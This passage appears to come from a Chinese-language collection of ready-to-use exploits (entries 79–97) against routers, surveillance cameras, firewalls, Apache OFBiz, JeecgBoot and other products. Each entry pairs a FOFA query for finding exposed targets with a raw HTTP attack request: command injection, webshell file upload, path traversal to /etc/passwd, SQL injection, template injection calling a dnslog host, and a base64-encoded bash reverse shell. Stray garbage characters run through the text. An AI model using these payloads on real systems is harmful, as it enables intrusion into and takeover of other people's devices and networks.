" s3 d5 U6 o8 S. z------YsOxWxSvj1KyZow1PTsh98fdu6l
6 P! }, p+ z4 D* e& Y, Y) pContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"
$ _2 \' [3 w$ @3 p, y: CContent-Type: image/png/ `% Q# s& x, }) U  E6 A- u+ y
9 D- e0 Y1 {- y4 }8 J
YsOxWxSvj1KyZow1PTsh98fdu6l
( |& K! v6 l* j' j% ~4 i------YsOxWxSvj1KyZow1PTsh98fdu6l
# S, g, t, V# x! H( r6 R3 L9 l9 BContent-Disposition: form-data; name="target"6 d8 }  m7 A6 C8 ]: a- l( @
4 M5 x& k8 ?2 V- C2 {( `
/Applications/SkillDevelopAndEHS/
( ]0 i5 R$ Y, y5 F( \0 W! J) \------YsOxWxSvj1KyZow1PTsh98fdu6l--) V5 I) l; F, |$ K, R% I
9 d4 \: t% v& [

9 e. h2 D0 |3 V0 @GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.16 x* w9 H% [% w, }! {0 N9 Y
Host: x.x.x.x& C. s, a( d/ d
) j' ]# y" @% k* X- j0 I: D
- I* j3 Q" r% L$ ?: }
79. BYTEVALUE 百为流控路由器远程命令执行. v' m3 W& G" q( a3 i8 q6 `
FOFA:BYTEVALUE 智能流控路由器
& D  ~) p- F- j2 N- z0 BGET /goform/webRead/open/?path=|id HTTP/1.18 r' _1 d( n4 {/ ^( P
Host:IP% b( [$ d: L( D1 K! i
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0% d4 C; G" ?% \0 S, a) `  i) ]
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.89 N" @( Y+ C+ W' Z& \0 E
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
6 D( Y. |4 X! CAccept-Encoding: gzip, deflate
8 p& s9 _; x7 B( g! nConnection: close
+ Q* `! }( q- x4 ^4 b8 |Upgrade-Insecure-Requests: 1
+ @' J: Q* P! p( |1 C, M3 S% }  Y) D  U  P- l4 x* F

' V# m( ^! n1 r* i80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
  p2 Y( r( e  Y- o0 FFOFA:app="速达软件-公司产品"
9 k5 c- w+ F8 r9 b7 RPOST /report/DesignReportSave.jsp?report=../xykqmfxpoas.jsp HTTP/1.1
1 ~$ l2 t: M. L2 EHost: x.x.x.x
. e' {3 r6 j7 ]User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.158 M& u; z/ o$ j: q
Content-Length: 27
! K# b1 L8 p8 [/ n! C4 nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
2 Z% K- ?0 H, r% Y& qAccept-Encoding: gzip, deflate8 l7 w; m4 k" ?" \( t# {' c5 x
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 d: I8 i, o0 I5 {, G
Connection: close
% J. \  Z' D7 q% T# i& M5 C: y! `Content-Type: application/octet-stream
8 x( B, C  \: R& |Upgrade-Insecure-Requests: 1
- E) C: i( u; N5 Z3 L) o, x% t4 }" h9 @6 R4 Y
<% out.print("oessqeonylzaf");%>
& [+ N' I# k6 @5 v; {4 p
! X3 F4 j$ ]7 i6 s* R5 g  S7 B+ b5 z, u, u
GET /xykqmfxpoas.jsp HTTP/1.1
+ d3 _! Z8 p# ]6 n9 ~( e& l1 E2 [9 pHost: x.x.x.x
- @* X6 E# |0 {# P! `# X8 N& g( K* cUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
* G6 T+ Y4 h% \) q$ p, J5 Z7 d2 J0 M0 dConnection: close; p% s7 {+ a9 S+ ~5 E7 ~9 Q
Accept-Encoding: gzip
/ M+ H0 V5 B" @4 ?- ]1 d1 ~8 D) S, i* d, I* x: o" D

" t' l/ m& j/ c+ H" v81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
- o  C5 C, r. b+ P# L2 {FOFA:app="uniview-视频监控"
! W2 r9 d- [+ ^, j' \9 Y, eGET /cgi-bin/main-cgi?json={"cmd":255,"szUserName":"","u32UserLoginHandle":-1} HTTP/1.1
! U6 o6 N  l& F, k& S0 |0 UHost: x.x.x.x
* A+ f; U! h' k$ w' I2 HUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
4 X  T. M7 v- o% s, R  SConnection: close
8 v& M1 o* `% v  s5 N  x5 @Accept-Encoding: gzip
8 }# V& H5 J* |1 s7 h3 m) t. A" `; [: ?
0 I( m8 V- m! s9 J$ g& M3 s# I: _( n7 ]1 p# X+ v  \6 v
82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
, t+ |1 H% u; YFOFA:app="思福迪-LOGBASE"
( \# T5 w& j' ~' ]! ?POST /bhost/test_qrcode_b HTTP/1.10 s% b2 y. I! u1 Q- k6 y6 A4 d
Host: BaseURL7 j0 n8 P, C! v% J  u; I
User-Agent: Go-http-client/1.12 D6 n) U7 ]7 K% v) r* s, t" U
Content-Length: 23
, L1 Q1 R& l" ?4 ^Accept-Encoding: gzip3 l. x) L, f* J8 F7 L9 Y4 B  y0 Y
Connection: close5 ~, ~# S+ S$ h& f. b5 f3 e2 _
Content-Type: application/x-www-form-urlencoded
" K) M% V5 ?2 o$ t2 \Referer: BaseURL
* v/ g* G- k3 K& |
# v& f' j) n) I, `  iz1=1&z2="|id;"&z3=bhost- a4 S8 M0 _/ i5 o$ X6 R9 s# ?
. n( W0 B. A/ V/ a  l9 C

! Q4 R4 k" L' d8 ?5 x- E3 @83. JeecgBoot testConnection 远程命令执行
* X( U- X# u+ g% ]( \FOFA:title=="JeecgBoot 企业级低代码平台"
3 U! p* u, C- f  y" W" L; t8 _5 Q0 ~0 H9 N( e2 o3 F- k
/ g  s) C$ C. p  p2 l) \1 i) e
POST /jmreport/testConnection HTTP/1.15 h/ U5 m* [; E5 `. f3 [2 |
Host: x.x.x.x
" g  T7 z2 a$ bUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.153 i) q! z) X' p8 B8 ^$ X6 b! W- r
Connection: close: b' C3 p' c( k5 v4 C3 k: e
Content-Length: 8881
  \4 s0 L+ B! g; k! p$ t- OAccept-Encoding: gzip4 l2 ]( }5 u  l+ C& X/ _6 V, I
Cmd: echo "2ZTvHsq4au3uOQ2mK9OuJb86rdO"
4 j  c; G- n4 s5 Y$ HContent-Type: application/json. ~* {1 P+ \' m2 ~. N
: p  U9 E/ I5 E1 j' v* N
PAYLOAD, d9 _4 `1 d( N2 i) K3 n- Y& P

; }' V$ w# V- @3 Y  p& N5 E. t84. Jeecg-Boot JimuReport queryFieldBySql 模板注入! p: B! x' d, n0 Y
FOFA:title=="JeecgBoot 企业级低代码平台"
7 G% B  A  y* l5 }
7 z, m2 _$ `8 `0 O; P8 S& d" v% n" G' u, [; |6 ~; ^
- \7 f* s& G1 A0 i* r
POST /jeecg-boot/jmreport/queryFieldBySql HTTP/1.1' e1 f! M' |) \! X+ n' j) i
Host: 192.168.40.130:8080
* ]7 A" j8 b, ^% U( O( s9 QUser-Agent: curl/7.88.1
1 U# ]* z: L8 }' h5 |" i+ rContent-Length: 156  c% @1 f; \" x0 N. Y! L
Accept: */*: H# I# L9 Z7 s0 U+ g
Connection: close
2 O1 A" ]+ d& u, _! x$ X0 c- j7 J/ n" U* P4 eContent-Type: application/json
$ v* T3 I% w1 |. x$ k1 YAccept-Encoding: gzip( ]- b+ [; c9 Z# z+ ~2 R+ ?

( G+ Y2 T3 T+ E' a" e  u/ Y& E! H{( f( ~5 |8 N3 c. B- s
"sql": "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"curl http://ip.port.kr9dqoau.dnslog.pw/`whoami\")}",1 v5 ~3 n9 ^9 k
  "type": "0"
+ F! ~7 G) p( k0 r1 l2 ]}: D' ]. R8 l# c0 ]- u0 t6 g/ v

. j( f1 P- U8 k: c, r4 h( Z% C/ E+ p# R5 W+ B0 D0 E$ I9 N
85. SysAid On-premise< 23.3.36远程代码执行1 \& S$ B, O6 O; `* i6 Q
CVE-2023-47246
$ U8 a7 P! V  W. k# R* qFOFA:body="sysaid-logo-dark-green.png"
( v, Q) J% \5 ]. x/ p3 E: PEXP数据包如下,注入哥斯拉马
+ g% r2 [; ~$ F$ cPOST /userentry?accountId=../../../tomcat/webapps&symbolName=LDAP_REFRESH_ HTTP/1.17 S, M" B& p) G# S) N; g! ?
Host: x.x.x.x
8 Q5 P& \/ F7 `8 o% V* |& {  ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.159 A) ?( D; y' T4 L
Content-Type: application/octet-stream% ?2 V) L& g4 V$ }/ q" d
Accept-Encoding: gzip: x! n: g% L+ P, K$ ^0 y
% I0 ?" _$ Y* ~2 K: [! P& g
PAYLOAD
2 s1 V3 Y) W/ D
1 w& Y0 U* U! n) |8 r5 t回显URL:http://x.x.x.x/userfiles/index.jsp
+ ~3 U+ @7 m9 c* E2 t+ g# Y! V2 W! x
86. 日本tosei自助洗衣机RCE
! g1 D3 s. o; R% HFOFA:body="tosei_login_check.php"
$ g6 m8 m' W1 j3 x+ R1 U" s/ TPOST /cgi-bin/network_test.php HTTP/1.1
1 k# g  y5 h0 z; w. wHost: x.x.x.x
* a! z1 ~; |! @+ D; K- pUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
, j3 `7 ~$ b1 K" y( W8 j7 I3 Q! }% IConnection: close0 K# N( y$ T! ~2 P8 R% X5 X7 g
Content-Length: 44
1 l! ?: o7 s0 MAccept: */*
. u0 W& H5 K8 U4 AAccept-Encoding: gzip
# y, A; n. c$ F; t- o) n( l$ zAccept-Language: en
: Y1 T* w2 p; R" }2 S; T! T- jContent-Type: application/x-www-form-urlencoded0 p3 X9 H. f9 J/ o( m# B; c
% @- x/ h. b  n1 P
host=%0acat${IFS}/etc/passwd%0a&command=ping$ D$ c% X9 b7 l) v$ \

4 ]) q; d. N2 _& I4 X
: r+ {8 @9 z' e) y87. 安恒明御安全网关aaa_local_web_preview文件上传
0 w  h0 P, d3 J( ]+ G: rFOFA:title="明御安全网关"
( w2 e( `& q* n- ^; r& Z& A8 OPOST /webui/?g=aaa_local_web_preview&name=123&read=0&suffix=/../../../jfhatuwe.php HTTP/1.1
, x0 t/ K8 X0 n' CHost: X.X.X.X
- @  P0 z, O6 B) e1 K: gUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; p0 w! A( t/ ?/ ^! }5 D- [8 r
Connection: close
. x' _* x& T: }. C& E4 a$ j  LContent-Length: 1986 b- e% n- G" \  k7 |, [$ |1 W
Accept-Encoding: gzip
! Y- `5 {  e% pContent-Type: multipart/form-data; boundary=qqobiandqgawlxodfiisporjwravxtvd
& L% f3 q' t9 o0 @6 q! g, Z$ ?! t: S+ e
--qqobiandqgawlxodfiisporjwravxtvd" f4 ~3 b* `: G5 N2 c
Content-Disposition: form-data; name="123"; filename="9B9Ccd.php"; X0 m0 k2 ~  t4 J
Content-Type: text/plain
4 D$ M# D7 }" q8 D1 N
5 u6 ~% p2 Z( z* k: G9 H2ZqGNnsjzzU2GBBPyd8AIA7QlDq
) ~% y- k. k3 o8 V5 X( \9 L3 x--qqobiandqgawlxodfiisporjwravxtvd--0 C8 {+ p1 ~: }6 y- O0 X5 R. O4 h

8 m$ M. B8 e0 {0 H' q( s3 b' \$ q
) y0 C- e# M5 Z/jfhatuwe.php
" v  B# w" `6 v1 T' b' U6 E: |. y1 J+ X0 ?' m$ {
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行- S* A" Q+ e; o' c6 |. m
FOFA:title="明御安全网关"
0 c, z$ ?! W7 {: X& ~3 NGET /webui/?g=aaa_portal_auth_config_reset&type=%0aecho%20%27%3C%3Fphp%20echo%20%22assdwdmpidmsbzoabahpjhnokiduw%22%3B%20phpinfo%28%29%3B%20%3F%3E%27%20%3E%3E%20%2Fusr%2Flocal%2Fwebui%2Ftxzfsrur.php%0a HTTP/1.1% k! U5 z. o, h0 S
Host: x.x.x.xx.x.x.x5 U7 D: ]% B5 b% \/ K, a2 }2 ~+ w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ g7 D2 Y; `4 R8 C; {6 AAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  @. }7 L7 d( q6 I3 w
Accept-Encoding: gzip, deflate
  L, t3 Y$ I" ^  FAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.23 z) \4 k7 J7 w: s5 v2 v  f
Connection: close
: {- e5 T& Z0 `  \: S' \, d. e" Z" {' [/ U! B7 p. Q  R9 u% L" i

0 j% Z2 \% H. n/ \; r; {4 ~4 f/astdfkhl.php
" z+ p9 D' |" K2 S+ n- r* G5 ~9 o! Z
89. 致远互联FE协作办公平台editflow_manager存在sql注入$ w' J  j1 a  ]
FOFA:title="FE协作办公平台" || body="li_plugins_download"0 f: K$ n( A; I& q6 D6 p8 }
POST /sysform/003/editflow_manager.js%70 HTTP/1.16 `5 k3 Y9 g4 X; V( c4 j8 g
Host: x.x.x.x* @4 g" @& j1 h% e& c
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; K! _) o0 ~8 k) Q/ \
Connection: close9 h1 K+ b- j/ L; B4 \
Content-Length: 41: @- r; [0 j& Q5 l" S: q/ q4 L! s
Content-Type: application/x-www-form-urlencoded
/ Q8 J; A6 M: t9 e; {, C' E+ r% DAccept-Encoding: gzip% n4 M2 C& p1 [

6 `. t! I4 O- [! Xoption=2&GUID=-1'+union+select+111*222--+0 r7 c; n. ?# S& b. Z* _$ L* p

: r$ v7 T4 G6 u6 k0 |
- F! l& m& e. t8 ^/ c3 R90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行  K7 r) Y* ?2 \/ Q% \: M# S4 o
FOFA:icon_hash="-1830859634"
& r( p/ K- w- ~# Q4 pPOST /php/ping.php HTTP/1.16 U  D0 s+ y) H* j; ?, A) F
Host: x.x.x.x
% S" [, P( p5 e) T' p. B+ ~  OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
' o) E; S+ @# L+ ^Content-Length: 51
4 b1 e! `! a8 F' ~- b4 G" a8 yAccept: application/json, text/javascript, */*; q=0.01/ ^! p% `6 M5 C: d3 N) C
Accept-Encoding: gzip, deflate
7 O9 v# q( e' w- ?. OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.25 d) u( W' Q: k" B+ ^1 F: B6 p
Connection: close& w0 U, ]4 b- a0 K+ t9 i" W) B/ e8 \
Content-Type: application/x-www-form-urlencoded
6 Y! v5 B% p5 F% L2 w- ~0 r' XX-Requested-With: XMLHttpRequest
$ Y7 h  E1 F0 d0 ?5 W2 U5 a% k: j% D/ S$ d! `' n
jsondata%5Btype%5D=99&jsondata%5Bip%5D=ipconfig+ Y  B4 K4 `' D, L1 T% a4 e4 ?
7 T7 O" `# N( i  v
7 x! {, M, i/ c* e7 z) ^$ d
91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取$ F# h/ C5 E! y2 E! _! b1 J7 ~
FOFA:title="综合安防管理平台"
: H- k( ^, `3 x' }GET /center/api/task/..;/orgManage/v1/orgs/download?fileName=../../../../../../../etc/passwd HTTP/1.1& q3 A. W- G& D& s
Host: your-ip
! b8 z$ q8 r0 b9 F8 ?5 K( hUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
, D+ D, f0 W; LAccept-Encoding: gzip, deflate
" W9 w9 `5 c+ `! l/ PAccept: */*2 w! |8 Q4 J2 W
Connection: keep-alive
% S, u4 [3 h" p% f& e1 H$ H9 m, Q! G& ~2 j* W1 \& ?
9 R) V- O/ C7 V& o4 e1 x1 t
  a! h1 }/ @: j3 k( P
92. 海康威视运行管理中心session命令执行
+ t7 E# f7 u( w: E* RFastjson命令执行+ p0 M8 Q0 @+ e/ F6 Z* @
hunter:web.icon=="e05b47d5ce11d2f4182a964255870b76"6 u! w2 ~& K' f4 R; v" @
POST /center/api/session HTTP/1.1
: D. l* @$ X( P" ]8 GHost:
7 Z0 \; l9 F4 E- J$ w8 q( kAccept: application/json, text/plain, */*; }5 H/ d/ A& b* `$ X. v4 S
Accept-Encoding: gzip, deflate
. w# o, W: C! h, V  r# ~4 \- S6 fX-Requested-With: XMLHttpRequest
8 l2 C# @' C  H$ {0 \9 x0 jContent-Type: application/json;charset=UTF-8, w- U0 l$ y7 I3 D
X-Language-Type: zh_CN) F3 Y* [5 b5 s! _4 ]
Testcmd: echo test
7 X/ k. P7 B5 ^User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X -1_0_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36( A9 l$ @0 \/ N& u
Accept-Language: zh-CN,zh;q=0.90 Z9 J5 h5 `1 x9 {. H
Content-Length: 5778
; w5 j' h3 P/ p! i$ S5 v' O' \2 ~7 q' X
PAYLOAD: L4 n- u' C- ~, z' j: |( P0 k; k9 Q

. `  O6 p( @, E5 K( j
% F# ~5 o/ h( s1 ^* j9 E% r5 M93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传
( b9 V1 C* w! P: p( @7 WFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
, |+ C  @8 [2 w! A) f; uPOST /?g=app_av_import_save HTTP/1.1
+ c; p4 F5 y/ m; h1 {0 f: I. vHost: x.x.x.x
% n- ?' q8 ~4 ]Content-Type: multipart/form-data; boundary=----WebKitFormBoundarykcbkgdfx' u) b6 U/ g8 a8 X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
7 A9 C5 d5 y2 B
3 a' j1 f  r, a( f3 q6 G------WebKitFormBoundarykcbkgdfx
$ H. A( y) H' f. B& Q4 SContent-Disposition: form-data; name="MAX_FILE_SIZE"
7 \% S: H$ Y( w) F2 `* _: @9 }8 I2 ?3 A
100000004 F) X. K* W" _+ n' C) J, @
------WebKitFormBoundarykcbkgdfx! @" o1 s% w4 E- ~! u- q
Content-Disposition: form-data; name="upfile"; filename="xlskxknxa.txt"
% q( g+ b- s1 `! i8 ~" B" yContent-Type: text/plain
0 W7 q# H& P' G2 e1 G- p" Z5 p% Z* W4 G1 S. X
wagletqrkwrddkthtulxsqrphulnknxa
  K6 b$ k2 g% |5 a- ~- ]------WebKitFormBoundarykcbkgdfx
9 v' d' |# n1 b* k$ RContent-Disposition: form-data; name="submit_post"( t; L0 D: r9 k/ N! y( A
6 T+ V* G, Y4 g$ O
obj_app_upfile. H; w* [/ N4 H
------WebKitFormBoundarykcbkgdfx% m3 {9 I, t: a2 d! N6 B8 f
Content-Disposition: form-data; name="__hash__"9 u* j  f3 D7 o9 E' l

7 E& \" b$ a) ?  l7 X5 }1 r% H0b9d6b1ab7479ab69d9f71b05e0e9445, H3 M; c/ d% [% ^; }
------WebKitFormBoundarykcbkgdfx--
- k1 G7 L% Q, J5 ^0 t
7 p$ x3 N* E0 i: z4 b
+ B$ ]$ A2 k9 o  y8 W( D: \. g- t( aGET /attachements/xlskxknxa.txt HTTP/1.18 m' N1 ^" c$ F! q7 S
Host: xx.xx.xx.xx
1 W! o5 G6 E6 H! E: ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36* o. |$ ?. }2 u
( o2 ?; m* |) }- g3 g! V
. s8 ?7 q. [1 k+ H1 }
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传
5 P+ \& h$ N( J9 n) D" E2 QFOFA:fid="1Lh1LHi6yfkhiO83I59AYg=="
0 s5 n9 u& l; u* a- c4 qPOST /?g=obj_area_import_save HTTP/1.1' h( O" @. M/ u; \
Host: x.x.x.x
) Z+ S( y+ ~" O1 RContent-Type: multipart/form-data; boundary=----WebKitFormBoundarybqvzqvmt' c$ e( s9 i8 T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36/ Z3 V2 W. J7 c8 j5 Y: `

- r' M  {, M  P/ Q/ G------WebKitFormBoundarybqvzqvmt* J* z; l/ }) {9 i6 @* l
Content-Disposition: form-data; name="MAX_FILE_SIZE"
7 i0 V% W- s: K6 b% }
3 [! c! b+ _: Z# i6 d* O10000000
, f5 V* m5 i; f! O/ I: C------WebKitFormBoundarybqvzqvmt
! G/ T/ `8 S- O" JContent-Disposition: form-data; name="upfile"; filename="cciytdzu.txt"6 _- B0 ^* v2 J4 v( _2 q  @
Content-Type: text/plain
$ h: H, e9 N& e/ N
& o; o* E$ @' Bpxplitttsrjnyoafavcajwkvhxindhmu
8 J) _; u  ]1 |% f8 i------WebKitFormBoundarybqvzqvmt
0 k& R# o& I, c8 Z9 GContent-Disposition: form-data; name="submit_post"* D6 o9 _# s2 o: N6 w$ }) q, w

* s2 S/ y, I% Dobj_app_upfile3 M4 N' w8 H) _$ D' o
------WebKitFormBoundarybqvzqvmt( W1 R2 H3 y  a! q- E0 z% e
Content-Disposition: form-data; name="__hash__". {5 n3 |7 D. }! G9 }4 O

) p' m6 R/ b5 B5 u0b9d6b1ab7479ab69d9f71b05e0e9445
6 E, u5 Q% F) Y8 t, V" H7 ^9 |------WebKitFormBoundarybqvzqvmt--
2 F/ g4 z7 K* U% z& M; y2 h- z5 X
& |) [$ b2 x* }. _, B! v2 c7 H
' P) Y/ r8 c+ z2 q& k$ O/ H0 h
+ p9 j2 k1 N- k9 b" c+ tGET /attachements/xlskxknxa.txt HTTP/1.1$ X( H' Q5 D& s$ N
Host: xx.xx.xx.xx& g2 F2 H: X; r; t
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
9 O1 p* e: l  t) {4 ^6 N; ~6 t' `* C4 h! {0 V
: `- N3 R8 S% p: A; J

: ]2 H- @. S* N95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行# Q+ ^2 L0 R/ r
CVE-2023-49070$ [4 \8 M# Y9 z1 Q7 T$ V* j. n
FOFA:app="Apache_OFBiz"6 B$ X/ d7 b2 C5 n4 c0 V8 a/ Q
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1! G2 F) E! w. T+ @" m5 z, K
Host: x.x.x.x3 \, c6 T' j- }2 H8 R
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ Q3 E& M0 e2 \9 p- [# D9 D; HConnection: close
( _8 q; t, q% @3 @Content-Length: 889" [5 j5 R% v$ E9 B1 g# }
Content-Type: application/xml
# E( ~1 F" X% y0 \; B; dAccept-Encoding: gzip
% D0 z' O5 E  N' a. Z3 H
* A- C( u9 P8 x<?xml version="1.0"?>% u) y) y& G3 M- h5 c# ?6 L
<methodCall>
: X! y) p7 p7 }% D, a$ d" _% I   <methodName>2a4UTp2XBzXgziEO3BIFOCbJiI3</methodName>9 L8 l3 ?$ ^7 t+ R0 Q) `; x
    <params>
3 f; @7 w# L7 x% H0 l' p      <param>
  A# a$ ?( Y- ]  {      <value>, v7 I6 p5 ~; M
        <struct>
. P, {) I9 P# i# o4 c       <member>
  V6 B6 O& v- V3 g( h          <name>test</name>5 S4 ]1 s7 s" a' R( b- E% b# q
          <value>
8 \0 J. k* M' k* V% B  ~: A3 g0 j3 `% T      <serializable xmlns="http://ws.apache.org/xmlrpc/namespaces/extensions">[payload的base64值]</serializable>0 c) Z1 o/ \0 O9 ?
          </value>
/ @: p& w( f( Z9 h! z2 [+ H        </member>
9 s: y- H+ k2 B9 m$ {! U$ j; ~9 n      </struct>* m3 n# Q) q; D2 R' T( p! C; ^
      </value>
" Y" \2 i  u9 r" P- {& I6 m, V    </param>3 B0 n$ g( H6 Y
    </params>4 z8 ]9 `( p7 t
</methodCall>
. o4 I7 s: @+ m* _4 J$ M) V' F$ v1 m8 s9 |3 c; U6 i
- }% W( J8 ]4 N# d
用ysoserial生成payload6 z5 C( |5 k( h
java -jar ysoserial-all.jar CommonsBeanutils1 "ping 41e87zy3.dnslog.pw" | base64 | tr -d "\n"1 f) p5 m: @* l' m0 n9 m& K
, m+ y/ a# c/ A, N8 ]5 {5 u

! ]* u) ?6 R$ S' Q将生成的payload替换到上面的POC2 q$ e7 m* `" a4 v% o; D- [
POST /webtools/control/xmlrpc;/?USERNAME&PASSWORD=s&requirePasswordChange=Y HTTP/1.1
1 [! `; |9 B1 qHost: 192.168.40.130:8443
  J( g& X" ]$ N( I' u" z7 t# g& qUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.363 r8 e# W2 F9 N1 L! l8 T8 e
Connection: close  ~# e1 M; ^) I5 Y$ f. H5 T
Content-Length: 889
9 Y: P6 f. f5 C( u) D# tContent-Type: application/xml
- t' |5 K5 H# x1 H, {Accept-Encoding: gzip
8 K4 A. P6 [: [8 K/ A
/ ?0 q/ _- R, p! FPAYLOAD
( V4 W( m' b) L5 v- w* V! B' i6 a$ B: v" [# O% C
96. Apache OFBiz  18.12.11 groovy 远程代码执行0 ^/ J" ]/ s7 B
FOFA:app="Apache_OFBiz"
# B: q% P9 a6 W5 {POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1
, M- n( x* u) A) a$ g7 A+ wHost: localhost:8443
) h  O$ n' h+ ?0 R% O2 O0 N* lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
) y- e1 t, k7 v0 |Accept: */*
5 E& R% Y! A. E& O& tAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
8 ]& a) m% I. i* ~4 Y0 z5 GContent-Type: application/x-www-form-urlencoded
/ Y$ M! _3 O( u" }. kContent-Length: 554 E5 _: U+ N) V$ u. E- M  w5 |

- n6 ~5 T1 u* B5 E2 X! ]3 r9 x# ZgroovyProgram=throw+new+Exception('id'.execute().text);# [+ E' J: n% S9 s( s% S; K! X

* s; A/ L  H& t+ Q- c( y. I+ k3 a- c! I+ N
反弹shell
0 x& r  M$ {$ F6 g/ U! [在kali上启动一个监听8 e  w2 a: r1 T3 u3 _* _
nc -lvp 7777
7 e* v& K$ x  X6 n5 F: |4 ~( [. j4 @; R9 ~$ L
POST /webtools/control/ProgramExport/?USERNAME=&PASSWORD=&requirePasswordChange=Y HTTP/1.1- j  g: z/ T+ D% [9 M
Host: 192.168.40.130:8443
0 h+ Z, ]$ @1 P- }+ jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0' C4 N% a1 ~$ B" G
Accept: */*/ j0 ]" q: ^6 q$ I$ K( \. \* o* s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
% o" {6 `; e- h6 _& F, iContent-Type: application/x-www-form-urlencoded
# Y( r1 I  ]- H" |& {0 yContent-Length: 71
- [5 V# n; c9 N
2 t3 n+ z' m+ CgroovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();: y' @# I7 S. Y( S6 u& u
9 p. K6 g8 d# }/ R7 L! `2 B
97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行7 l4 h3 o4 l, @/ u4 H# f! n
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
% |" d) H2 I7 I8 [: HGET /passport/login/ HTTP/1.1/ T2 v3 t6 M* W7 s1 x0 P! [" O
Host: 192.168.40.130:8085
# o; ?. k8 {! J4 _3 nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
